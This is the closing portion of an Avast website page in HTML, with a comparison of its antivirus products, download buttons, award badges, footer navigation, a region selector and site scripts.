  <td class="val c4"><span class="yes"><b>yes</b></span></td>
</tr>
<tr class="feature">
  <td class="txt"><b>Shred before you sell</b> Or lend or repair. Deleting doesn’t get rid of files for good.</td>
  <td class="val c1 empty">&nbsp;</td>
  <td class="val c2 empty">&nbsp;</td>
  <td class="val c3 empty">&nbsp;</td>
  <td class="val c4"><span class="yes"><b>yes</b></span></td>
</tr>
  
    <tr class="buttons lower">
        <td class="description">&nbsp;</td>
        <td class="val c1">
          <a href="/download-thank-you.php?product=FAV-ONLINE&locale=en-ww" class="big button blue download-nofdi tsl-free-btn-dwn bi-download-link" data-bi-download-name="FAV-ONLINE"><span>FREE DOWNLOAD</span></a>
        </td>
        <td class="val c2">
          <a href="/pro-antivirus" class="big button blue"><span>Download</span></a>
        </td>
        <td class="val c3">
          <a href="/download-thank-you.php?product=ISE-ONLINE&locale=en-ww" class="big button blue bi-download-link" data-bi-download-name="ISE-ONLINE"><span>Download</span></a>
          <p class="trial">Free 30-day trial</p>
          <a href="/internet-security" class=" button white"><span>LEARN MORE
</span></a>
        </td>
        <td class="val c4">
          <a href="/download-thank-you.php?product=PRE-ONLINE&locale=en-ww" class="big button blue bi-download-link" data-bi-download-name="PRE-ONLINE"><span>Download</span></a>
          <p class="trial">Free 30-day trial</p>
          <a href="/premier" class=" button white"><span>LEARN MORE
</span></a>
        </td>
    </tr>
</table>
	</div>
</div>
<!-- /comparision -->

<!-- compatibility -->
<div id="compatibility">
	<div class="AVsizer">
		<p><img src="//static.avast.com/11/web/min/i/index/win-ico1.png" alt="">Compatible with <a href="/windows-10-antivirus" title="Antivirus for Windows 10">Windows 10</a>, <a href="/windows-8-antivirus" title="Antivirus for Windows 8">8</a>, <a href="/windows-7-antivirus" title="Antivirus for Windows 7">7</a>, <a href="/windows-vista-antivirus" title="Antivirus for Windows Vista">Vista</a>, <a href="/windows-xp-antivirus" title="Antivirus for Windows XP">XP SP3</a></p>
	</div>
</div>
<!-- /compatibility -->

<!-- stats -->
<div id="stats">
	<div class="AVsizer">
		<h2>The world’s number one security</h2>

		<div class="stat">
			<p class="like-h3"><span class="js-count">400</span> million</p>
			<p>people protected worldwide</p>
		</div>
		<div class="map">
			<img id="js-main-image" src="" alt="">
<img id="js-preload-image" style="display:none" src="//static.avast.com/11/web/min/i/index/pt01.gif" alt="">
			<div class="count">
				<p><span class="js-count">400</span> M</p>
			</div>
			<div class="mapOverlay"></div>
			<div id="js-map-boxes" class="boxes">
				<div class="box"></div>
				<div class="box dark"></div>
				<div class="box"></div>
				<div class="box dark"></div>
			</div>
		</div>

	</div>
</div>
<!-- /stats -->


<!-- awards -->
<div id="awards">
	<div class="AVsizer">
		<div class="row">
			<div class="span3"><img src="//static.avast.com/11/web/min/i/awards/award-cnet-dark-retina.png" alt="">
				<p class="award">The most downloaded software</p>
			</div>
			<div class="span3 amazon"><img src="//static.avast.com/11/web/min/i/awards/award-amazon-dark-retina.png" alt="">
				<p class="award">The best-selling security software</p>
			</div>
			<div class="span3"><img src="//static.avast.com/11/web/min/i/awards/award-av-dark-retina.png" alt="">
				<p class="award">Antivirus with the lowest impact on PC performance</p>
			</div>
           <div class="span3 softpedia"><a href="http://www.softpedia.com/get/Antivirus/Avast-Home-Edition.shtml"><div><img src="//static.avast.com/11/web/min/i/awards/award-softpedia-dark.png" alt=""></div>
            <p class="award">Official Download Partner</p></a>
			</div>
		</div>
	</div>
</div>
<!-- /awards -->								
        <div id="offer-chrome" class="bg-darker">
  <div class="AVsizer">
    
    <div class="row">
        <div class="span4" id="logo-chrome">
    
    <img src="//static.avast.com/11/web/min/i/lp/lp-virus-update/ico-chrome-75.png" alt="Chrome browser logo" />
    </div>
    
    <div class="span4">
      <p>Avast recommends using <br> the <b>FREE</b> Chrome&trade; internet browser.</p>  
        </div>
    <div class="span4" id="button-chrome">
    
    <a href="//www.google.com/chrome/browser/?brand=AVSF&amp;installdataindex=googlehomepage&amp;hl=en" class="button transparent big" target="_blank"><span>Download Chrome</span></a>
    </div>
    
    
    </div>
    
    
  </div>
</div>
      
    </div>
    
    <!-- /Content part container -->
    
    <!-- links -->
<div id="bottom-links">
    <div class="AVsizer">

        <!-- links region -->
        <div class="row region-selector">
            <div class="span12">
            <p class="region en-ww">
                <a href="#" class="button transparent big no-animate"><span>Worldwide (English)</span></a>
            </p>
            </div>
        </div>

        <!-- links internal -->
        <div class="row internal">
            
            <!-- section left -->
            <div class="span6 device">
                <p class="featured">Protecting 400 million people worldwide makes us world number one in the market. Protect your device too....</p>
                <ul>
                    <li class="pc"><a href="/windows" title="Computers, laptops and Windows tablets">PC</a></li>
                    <li class="mac"><a href="/mac" title="Even a Mac needs protection">Mac</a></li>
                    <li class="android"><a href="/android" title="Android smartphones &amp;amp; tablets">Android</a></li>
                    <li class="iphone"><a href="/ios" title="iPhones &amp;amp; iPads">iPhone / iPad</a></li>
                </ul>

            </div>

            <!-- section right 1 -->
            <div class="span3 navigation first">

                <div class="block products">
                    <div class="line">          
                        <h4><a href="/index">Products</a></h4>
                        <ul>
                            <li><a href="/home">For home</a></li>
                            <li><a href="/business">For business</a></li>
                            <li><a href="/education">For schools</a></li>
                        </ul>
                    </div>
                </div>

                <div class="block business">
                    <div class="line">   
                        <h4>Business Partners</h4>
                        <ul>
                            <li><a href="/affiliates">Affiliates</a></li>
                            <li><a href="/resellers">Become a reseller</a></li>
                            <li class="locate"><a href="/locate-dealer">Locate your reseller</a></li>
                        </ul>
                    </div>            
                </div>
                
                </div>
                <!-- section right 2 -->
                <div class="span3 navigation second">

                <div class="block support">
                    <div class="line">          
                        <h4><a href="/support">Help and Support</a></h4>
                        <ul>
                            <li><a href="/resend-license-paid.php">Recover your license</a></li>
                            <li><a href="//help.avast.com" target="_blank">Online help</a></li>
                            <li><a href="//forum.avast.com/" target="_blank">Forum</a></li>
                            <li><a href="https://www.the-parallax.com">Security news</a></li>
                        </ul>
                    </div>
                </div>
                
                <div class="block about">
                    <div class="line">   
                        <h4><a href="/about">The company</a></h4>
                        <ul class="arrow">
                            <li><a href="/about">About us</a></li>
                            <li><a href="/technology">Technology</a></li>
                            <li><a href="//press.avast.com/index">Press center</a></li>
                            <li><a href="/careers">Jobs</a></li>
                            <li><a href="/contacts">Contact us</a></li>                              
                        </ul>
                    </div>
                </div>

            </div>
        </div>
        
        <!-- links external -->
        <div class="row external">
            
            <div class="span6">
                <div class="block portals">
                        <ul>
                            <li class="foundation"><a href="//foundation.avast.com/">Avast Foundation</a></li>
                            <li class="blog"><a href="https://blog.avast.com">Avast Blog</a></li>
                        </ul>         
                    </div>
                </div>
                
                <div class="span6">
                    <div class="block social">        
                        <ul>
  <li class="fb"><a href="https://www.facebook.com/avast" title="Facebook"><span>Facebook</span></a></li>
  <li class="twitter"><a href="https://twitter.com/avast_antivirus" title="Twitter"><span>Twitter</span></a></li>
  <li class="gplus"><a href="https://plus.google.com/+avast" rel="publisher" title="Google+"><span>Google+</span></a></li>
  <li class="gdevelopers"><a href="https://plus.google.com/+Avast_devs/" title="Google+ Developers"><span>Google+ Developers</span></a></li>
  <li class="youtube"><a href="//www.youtube.com/avast" title="YouTube"><span>YouTube</span></a></li>
</ul>
                    </div>
                </div>
            
        </div>
        
        
    </div>
</div>
<!-- /links -->
    <!-- footer -->
<div id="footer">
    
  <div class="AVsizer clearfix">
    <!-- footer bottom -->
    <p class="links">
      <a href="/privacy-policy">Privacy Policy</a> <a href="/acceptable-use-policy">Acceptable Use Policy</a>
      <a href="/eula">License Agreements</a> <a href="/sitemap">Sitemap</a>
    </p>
    <p class="copy">1988-2016 Copyright AVAST Software s.r.o.</p>   
  </div>
  
</div>
<!-- /footer -->

<div id="lang-selector" class="clearfix">
	<div class="selector-close"></div>
	<div class="selector-block">
		<div class="recommended">
			<h3>This might suit you better
				<ul id="current-lang">
					<li class="en-ww"><a href="/windows"></a></li>
				</ul>
			</h3>
		</div>
		<div class="rs-region america"><h3>AMERICAS</h3>
			<ul class="possible-lang">
				<li class="es-ar"><a href="/es-ar/windows">Argentina</a></li>
				<li class="pt-br"><a href="/pt-br/windows">Brasil</a></li>
				<li class="en-ca"><a href="/en-ca/windows">Canada (English)</a></li>
				<li class="fr-ca"><a href="/fr-ca/windows">Canada (français)</a></li>
				<li class="es-cl"><a href="/es-cl/windows">Chile</a></li>
				<li class="es-co"><a href="/es-co/windows">Colombia</a></li>
				<li class="es-cu"><a href="/es-cu/windows">Cuba</a></li>
				<li class="es-us"><a href="/es-us/windows">EE.UU. (español)</a></li>
				<li class="es-mx"><a href="/es-mx/windows">México</a></li>
				<li class="en-us"><a href="/en-us/windows">USA (English)</a></li>
			</ul>
			<ul class="possible-lang other">
				<li class="es-ww"><a href="/es-ww/windows">América Latina (español)</a></li>
			</ul>
			<div class="clear"></div>
		</div>
		<div class="rs-region europe"><h3>EUROPE, MIDDLE EAST &amp; AFRICA</h3>
			<ul class="possible-lang first">
				<li class="nl-be"><a href="/nl-be/windows">België (Nederlands)</a></li>
				<li class="fr-be"><a href="/fr-be/windows">Belgique (français)</a></li>
				<li class="cs-cz"><a href="/cs-cz/windows">Česká republika</a></li>
				<li class="da-dk"><a href="/da-dk/windows">Danmark</a></li>
				<li class="de-de"><a href="/de-de/windows">Deutschland </a></li>
				<li class="es-es"><a href="/es-es/windows">España</a></li>
				<li class="fr-fr"><a href="/fr-fr/windows">France</a></li>
				<li class="fa-ir"><a href="/fa-ir/windows">ایران</a></li>
				<li class="it-it"><a href="/it-it/windows">Italia </a></li>
				<li class="hu-hu"><a href="/hu-hu/windows">Magyarország</a></li>
				<li class="nl-nl"><a href="/nl-nl/windows">Nederland</a></li>
				<li class="no-no"><a href="/no-no/windows">Norge</a></li>
				<li class="pl-pl"><a href="/pl-pl/windows">Polska</a></li>
				<li class="pt-pt"><a href="/pt-pt/windows">Portugal</a></li>
				<li class="de-ch"><a href="/de-ch/windows">Schweiz (Deutsch)</a></li>
				<li class="cs-sk"><a href="/cs-sk/windows">Slovensko</a></li>
			</ul>
			<ul class="possible-lang second">
				<li class="en-za"><a href="/en-za/windows">South Africa</a></li>
				<li class="fr-ch"><a href="/fr-ch/windows">Suisse (français)</a></li>
				<li class="fi-fi"><a href="/fi-fi/windows">Suomi</a></li>
				<li class="sv-se"><a href="/sv-se/windows">Sverige</a></li>
				<li class="tr-tr"><a href="/tr-tr/windows">Türkiye</a></li>
				<li class="en-ae"><a href="/en-ae/windows">United Arab Emirates</a></li>
				<li class="en-gb"><a href="/en-gb/windows">United Kingdom</a></li>
				<li class="el-gr"><a href="/el-gr/windows">Ελλάδα</a></li>
				<li class="he-il"><a href="/he-il/windows">ישראל</a></li>
				<li class="ru-kz"><a href="/ru-kz/windows">Казахстан</a>
				<li class="ru-ru"><a href="//www.avast.ru/windows">� оссия</a></li>
				<li class="uk-ua"><a href="//www.avast.ua/windows">Україна (українська)</a></li>
				<li class="ru-ua"><a href="//www.avast.ua/ru-ua/windows">Украина (русский)</a></li>
				<li class="ar-sa"><a href="/ar-sa/windows">المملكة العربية السعودية</a></li>
				<li class="ar-ww"><a href="/ar-ww/windows">الدول العربية</a></li>
			</ul>
			<ul class="possible-lang other">
				<li class="en-eu"><a href="/en-eu/windows">Europe (English)</a></li>
			</ul>
			<ul class="possible-lang"></ul>
			<div class="clear"></div>
		</div>
		<div class="rs-region asia"><h3>ASIA &amp; PACIFIC</h3>
			<ul class="possible-lang">
				<li class="en-au"><a href="/en-au/windows">Australia</a></li>
				<li class="en-in"><a href="/en-in/windows">India</a></li>
				<li class="hi-in"><a href="/hi-in/windows">इंडिया (हिंदी)</a></li>
				<li class="en-id"><a href="/en-id/windows">Indonesia (English)</a></li>
				<li class="id-id"><a href="/id-id/windows">Indonesia (Bahasa Indonesia)</a></li>
				<li class="en-my"><a href="/en-my/windows">Malaysia (English)</a></li>
				<li class="ms-my"><a href="/ms-my/windows">Malaysia (Bahasa Melayu)</a></li>
				<li class="en-nz"><a href="/en-nz/windows">New Zealand</a></li>
				<li class="en-ph"><a href="/en-ph/windows">Philippines (English)</a></li>
				<li class="tl-ph"><a href="/tl-ph/windows">Pilipinas (Filipino)</a></li>
				<li class="en-sg"><a href="/en-sg/windows">Singapore</a></li>
				<li class="vi-vn"><a href="/vi-vn/windows">Việt Nam</a></li>
				<li class="ja-jp"><a href="//www.avast.co.jp/windows">日本語 </a></li>
				<li class="ko-kr"><a href="/ko-kr/windows">대한민국</a></li>
				<li class="zh-cn"><a href="/zh-cn/windows">中华人民共和国</a></li>
				<li class="zh-tw"><a href="/zh-tw/windows">臺灣</a></li>
				<li class="th-th"><a href="/th-th/windows">ประเทศไทย</a></li>
			</ul>
			<ul class="possible-lang other">
				<li class="en-ww"><a href="/windows">Worldwide (English)</a></li>
			</ul>
			<div class="clear"></div>
		</div>
	</div>
	<div class="clear"></div>
</div>
    <!-- js -->
    <script>
    window.avastGlobals = window.avastGlobals || {};	
	window.avastGlobals.web = {
				locale: "en-ww",
				RootPath: "",
				language: "en-ww",
				numberDecimalSeparator: ".",
				numberThousandSeparator: ",",
				responsive: true,
				contentGroup: 'Consumer',
				pageName: 'en-ww | windows'
			};
</script>
    <script src="//static.avast.com/11/web/min/j/avast.js"></script>
<!--[if lte IE 8]>
	<script src="//static.avast.com/11/web/min/j/v2015/lib/json2/src/json2.min.js"></script>
<![endif]-->
<script src="//static.avast.com/client.js"></script>
    <!-- /js -->
    								
        <script src="//static.avast.com/11/web/min/j/index.js">												
            <!-- // -->												
        </script>
        <script type="application/ld+json">
{ "@context" : "http://schema.org",
  "@type" : "Organization",
  "name" : "Avast",
  "alternateName" : "AVAST Software",
  "url" : "https://www.avast.com",
  "logo" : "https://files.avast.com/files/marketing/logos/logo-horiz-gray-rgb-30mm.png",
  "contactPoint" : [{
    "@type" : "ContactPoint",
    "telephone" : "+1-866-951-7679",
    "contactType" : "customer service",
    "contactOption" : "TollFree",
    "areaServed" : "US"
    },{
    "@type" : "ContactPoint",
    "telephone" : "+44 800 404 7326",
    "contactType" : "customer service",
    "areaServed" : "UK"
    },{ 
    "@type" : "ContactPoint", 
    "telephone" : "1800 635 132", 
    "contactType" : "customer service", 
    "areaServed" : "AU" 
    },{ 
    "@type" : "ContactPoint", 
    "telephone" : "+1 855 201 8490", 
    "contactType" : "customer service", 
    "areaServed" : "CA"
    }],
  "sameAs" : [
	"https://www.facebook.com/avast",
	"https://twitter.com/avast_antivirus",
	"https://plus.google.com/+avast",
	"https://www.youtube.com/avast",
	"https://www.linkedin.com/company/avast-software"
	]
}
</script>
        <script type="application/ld+json">
{ "@context" : "http://schema.org",
  "@type" : "Product",
  "name" : "Avast Free Antivirus",
  "brand" : "Avast",
  "manufacturer" : "AVAST Software",
  "url" : "https://www.avast.com/index",
  "image" : "https://files.avast.com/files/marketing/materials/boxshots/v2015/avast_free_antivirus_2015_boxshot.png"
}
</script>
    
    <script type="text/javascript">
setTimeout(function(){var a=document.createElement("script");
var b=document.getElementsByTagName('script')[0];
a.src=document.location.protocol+"//dnn506yrbagrg.cloudfront.net/pages/scripts/0010/8906.js?"+Math.floor(new Date().getTime()/3600000);
a.async=true;a.type="text/javascript";b.parentNode.insertBefore(a,b)}, 1);
</script>
  </body>
</html>